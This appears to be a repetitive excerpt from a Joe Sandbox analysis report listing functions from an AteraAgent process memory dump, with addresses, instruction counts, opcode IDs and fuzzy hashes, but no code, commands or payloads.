                                                                                                                                                                                                                                                                            • Opcode ID: 1bc0bd443ff2b130329d15125023c46bfbde611f1f51790df5709a38810429b4
                                                                                                                                                                                                                                                                            • Instruction ID: 4538dfb6ea6ea003f56b9ba049879fe7bddc2ce4d56c2b6ca86af56e4d60deb0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bc0bd443ff2b130329d15125023c46bfbde611f1f51790df5709a38810429b4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D251407411AB06CFDB59EB28C090E6577A1FF56384B6089ADD05ECB6E2CA35EC46CB40
                                                                                                                                                                                                                                                                            Function 00007FFAAB462F45 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0f25c49b2b7df76a1682696429b601c84a2a4810a565781014aaf66d953791c1
                                                                                                                                                                                                                                                                            • Instruction ID: 81ae24eef47f5194eae222518fc167c10728fb68df07ea6bce63398a1e62769f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f25c49b2b7df76a1682696429b601c84a2a4810a565781014aaf66d953791c1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10512870919A0DCFDF94EF68C455AEDBBB1EF59340F10416AE40DE72A2DB39A844CB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB47F011 Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 89fd7e2f0391371f470cb8eb044eac9f78235d34bca3510cc7afa4b610d92d13
                                                                                                                                                                                                                                                                            • Instruction ID: 73642a52aac4237cf57c4f7db47450e85029ec53c80918ed48a47e4a1f159ef0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89fd7e2f0391371f470cb8eb044eac9f78235d34bca3510cc7afa4b610d92d13
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4441132061DA8A4FE799E72CC815A797BD1EF9A350B1441FEE44DC73A3DD18AC868381
                                                                                                                                                                                                                                                                            Function 00007FFAAB4638E1 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8e02044c6895715326c70484328a5992de242bdd64def9c47a698440bb4fd4c1
                                                                                                                                                                                                                                                                            • Instruction ID: 0be0e95f0b185b65003e9bb2d781e0839c9af3df55ce2419ad0a08a7257a1db8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e02044c6895715326c70484328a5992de242bdd64def9c47a698440bb4fd4c1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50418F70909A8DDFDB41DB6CC454AADBFF1EF5B340F1441AAD048DB2A2CA389945CBA1
                                                                                                                                                                                                                                                                            Function 00007FFAAB475140 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c5bc701c2e1f283beb7e7dd3dc91d416a171e517c17a0ab2e0847b599157f5d2
                                                                                                                                                                                                                                                                            • Instruction ID: 19b1be2319bdd38b9f8c36cec29ccee204e839f1a4cadd0351bd6bfb2ad5af79
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5bc701c2e1f283beb7e7dd3dc91d416a171e517c17a0ab2e0847b599157f5d2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 86418F3061DA858FEBA5EB2CC050E7677E1EF56340B1485A9D08ECB6A2CD25F849CB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB462F38 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ee372422686e8e79ab04eef646700d770e4f80839b58b91441ec647990801663
                                                                                                                                                                                                                                                                            • Instruction ID: 0a7d0382dc1649f92eab0c931af6e102459fcc3effc9fbb6b711e45422883ef0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee372422686e8e79ab04eef646700d770e4f80839b58b91441ec647990801663
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66416C70919A0DCFDF94EF68C455AEDBBB1EF59340F10416AD40DE72A2CB39A844CB81
                                                                                                                                                                                                                                                                            Function 00007FFAAB470220 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 22de3ddc54ebeccc1d4f832c4b965561fb203b693a83595ebb97426a0cf3c80a
                                                                                                                                                                                                                                                                            • Instruction ID: 91c52c1ef947cf2740ad9f638ce459bf7c3a9284f523fdb3e86ac2573982798d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22de3ddc54ebeccc1d4f832c4b965561fb203b693a83595ebb97426a0cf3c80a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 32418F31A18A0D8FDB98DF1884556BA37E1FFA9340F10416AE40ED3695CE35A84687C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB465768 Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 66db805fdc7609104df38edf4a21214311250040fc151048245df8ea9f87db5f
                                                                                                                                                                                                                                                                            • Instruction ID: f71ba77f1e5d48bcd8483bd9ae232d67022c3a4768108287d3370e1b47185fe9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 66db805fdc7609104df38edf4a21214311250040fc151048245df8ea9f87db5f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE41B071D0AA4DCFDB44EB68D4216ECBBB1FF4A341F50507AD04DE72A2CA755845CB80
                                                                                                                                                                                                                                                                            Function 00007FFAAB47D801 Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 8535460156bdd046c62318907c9e189f5abda101c1aa7e07435a6d2455a35152
                                                                                                                                                                                                                                                                            • Instruction ID: 33578a46c30c2b023f61d9ad047b825cfd3d4cf5b3c4e0d63dc15e0720d3d773
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8535460156bdd046c62318907c9e189f5abda101c1aa7e07435a6d2455a35152
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2441E17191EA898FEB86DF2888506A93FF0EF16350F0940BED049D71B3C6289889C791
                                                                                                                                                                                                                                                                            Function 00007FFAAB467180 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 41bc212fcefa72abd603401cc059acd3da20b3a7f4727ad98dfc6a96dccc0ec8
                                                                                                                                                                                                                                                                            • Instruction ID: 681a3392e8a9616e3378cf7b5a59cee8e5440e9f9d26688a50c9de1ead771acc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41bc212fcefa72abd603401cc059acd3da20b3a7f4727ad98dfc6a96dccc0ec8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231F472B29D1C8FEB94EB5C9499BB937E1FB99350F044176E00DD7295DE24AC4683C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB47A255 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1861343fef0af775ded02a3ae18abe5a3f761bdf2b75940d83da7eedc7aea2ff
                                                                                                                                                                                                                                                                            • Instruction ID: a2d9c58ab067950937375480864831f7a29ce5b21011d1c192a1d9f068e876e9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1861343fef0af775ded02a3ae18abe5a3f761bdf2b75940d83da7eedc7aea2ff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F731353160EB898FEBA8970D9845A7537D4EF56360F0941BAE08DC72F2DD25EC46C382
                                                                                                                                                                                                                                                                            Function 00007FFAAB47CF1D Relevance: .1, Instructions: 120COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: abfafe47a4e05fbb9e5cd3bb59f0eebc0c7c387a9c218e569b5549a26a4f7c9d
                                                                                                                                                                                                                                                                            • Instruction ID: 70a6240dd6e87b4c7e3a7c042f30a5769136f0080a8b32f74978647ba75997a4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abfafe47a4e05fbb9e5cd3bb59f0eebc0c7c387a9c218e569b5549a26a4f7c9d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F31A230619A09DBD768AB68C484AB973D2FF5A344F50857DD46FC32A1CE35B84687C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB470258 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a522cfb9aab01347f93f0bfc47647d663c802d0224f1c0495f5c1ff59a0a8dc8
                                                                                                                                                                                                                                                                            • Instruction ID: ec639d42673bd5cc355572f731ca3618fdad08248675fa2550bc1627fbb905f7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a522cfb9aab01347f93f0bfc47647d663c802d0224f1c0495f5c1ff59a0a8dc8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77310831B1DA458FE790D618944467AB7D1EFA9364F44067AD44CC32B2CA18E9C9C3C6
                                                                                                                                                                                                                                                                            Function 00007FFAAB46BB15 Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: a97805beeb6202e54aed0646393cccf1bf0ecf84d59beb9abf5b658d3622ae7d
                                                                                                                                                                                                                                                                            • Instruction ID: e396b12f9ce1837df450302d51bc9268793e67d22e0f0a8bfccf291e7cc43b9c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a97805beeb6202e54aed0646393cccf1bf0ecf84d59beb9abf5b658d3622ae7d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D341E9B2A1DB899FE345A778C8156A9BBB0FF56340F5441FAD048CB2A3CD2518458792
                                                                                                                                                                                                                                                                            Function 00007FFAAB474018 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 18bb32f216103762c0f8dd1764f942439514b5484d09655794193e71d24f6a28
                                                                                                                                                                                                                                                                            • Instruction ID: 24c8a5cd97d4d2fe686b249ed0e4a0a6f44928bd771514b81daf819f2783e13a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18bb32f216103762c0f8dd1764f942439514b5484d09655794193e71d24f6a28
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0215732B1DE4E8FEAD8E71C986937923C6EB993A1B04817BD80DC7295DD14EC4683C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB47CFF0 Relevance: .1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ae344b3da802e0c797a59f21b5d93f86b9da487d43b4667219060d4ca449c732
                                                                                                                                                                                                                                                                            • Instruction ID: 1a974c12bd4eda915602118793a76a03d6751919a05842d617b6437b2ddaecec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae344b3da802e0c797a59f21b5d93f86b9da487d43b4667219060d4ca449c732
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F31C132B19D198FEB54A76CE495BF833E1EF9A361F0841B6D00DCB2A6DD145C4687C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB4681AE Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b72d4dca03f37a66d502fba1781f5e71d3cbc7a58fd3ae09c0535e4be53121e5
                                                                                                                                                                                                                                                                            • Instruction ID: 00cc09ce43c5d411538cb7551aa6b10da4dc54a725a169b944c33f6e12734fb5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b72d4dca03f37a66d502fba1781f5e71d3cbc7a58fd3ae09c0535e4be53121e5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80413D70D0961D8FDB49EB68C464BBDBBB1EF56341F6400AED00DE72A2CB381985CB61
                                                                                                                                                                                                                                                                            Function 00007FFAAB489FC1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3292091e957b8bbc1e2ebd1b77081defffbc0ae489ed1f30d73e2be5af8989a5
                                                                                                                                                                                                                                                                            • Instruction ID: e93198285f3c8d688d28474a5daa110bcbf17935d8e623ee35f48c7859c392b4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3292091e957b8bbc1e2ebd1b77081defffbc0ae489ed1f30d73e2be5af8989a5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4331F47181DB888FDB18AF589C0A5E9BFF4EF9A310F04016FE489D3152D661B94887C3
                                                                                                                                                                                                                                                                            Function 00007FFAAB4798C8 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: fd7e266da9e17ab02f2742f748733896f8c8dfce1d2de742100d56509c6fbd2f
                                                                                                                                                                                                                                                                            • Instruction ID: ed37d39e4aac0ccfd523436d6716e893e52aa6c7a19a449e1924457602cebd9f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd7e266da9e17ab02f2742f748733896f8c8dfce1d2de742100d56509c6fbd2f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6531AA7150EBC68FD7578B2898606907FF0EF07254B1A44DBC489CF1B7E6689C4AC7A2
                                                                                                                                                                                                                                                                            Function 00007FFAAB47D03A Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0e37349b742da4386292c78d330cb88e0b146eb7d9a98cae586bb89623673145
                                                                                                                                                                                                                                                                            • Instruction ID: d468852c0dfe4b1fca63834525e14240108de8b77c4b6d4a6923806c88aa4237
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e37349b742da4386292c78d330cb88e0b146eb7d9a98cae586bb89623673145
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2021D172A19E1C8FEB94EB5CA498BE977E1FB99350F0441B6E40DC72A5CE209C4587C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB472B75 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0cd7ad79583470cad330bf9b8bd69469ff633152289696a74bf079df181a302c
                                                                                                                                                                                                                                                                            • Instruction ID: fb757c4a0c04dfd79c51725c42c195171f37e6add5160823e88cf656f53e1607
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd7ad79583470cad330bf9b8bd69469ff633152289696a74bf079df181a302c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04217033B0EA55CBE664867D78910B87FC1DF862A470842BBD50CC71A3D8064C46C3C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46BB05 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 0ed658cc10d93ffe5a14b1d9228f653aa6cb98ddc38ff5e909491944bf1f8858
                                                                                                                                                                                                                                                                            • Instruction ID: d71ad76879da41d7a30ac33c399556ba9fd3651916a679410ae40aa58662f658
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ed658cc10d93ffe5a14b1d9228f653aa6cb98ddc38ff5e909491944bf1f8858
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31C761B1E78A9FE345A778C4226BDBFB1EF56340F5441FAD00DCB2A3CD19184587A2
                                                                                                                                                                                                                                                                            Function 00007FFAAB485411 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 85d045c83c0ca9ed860b592fb102af70d0876d0c7f1eb38734eb43f3bfd03d1c
                                                                                                                                                                                                                                                                            • Instruction ID: d7cf76596e27bfc1ab37a2a7d10b1af8a1a5bfdef63eba5d64804e53d9495909
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 85d045c83c0ca9ed860b592fb102af70d0876d0c7f1eb38734eb43f3bfd03d1c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C121AE30A1DA1C8FEB88DF4C94417BC77E1EF99751F04427ED04ED32A1CE24A8458781
                                                                                                                                                                                                                                                                            Function 00007FFAAB46BE16 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
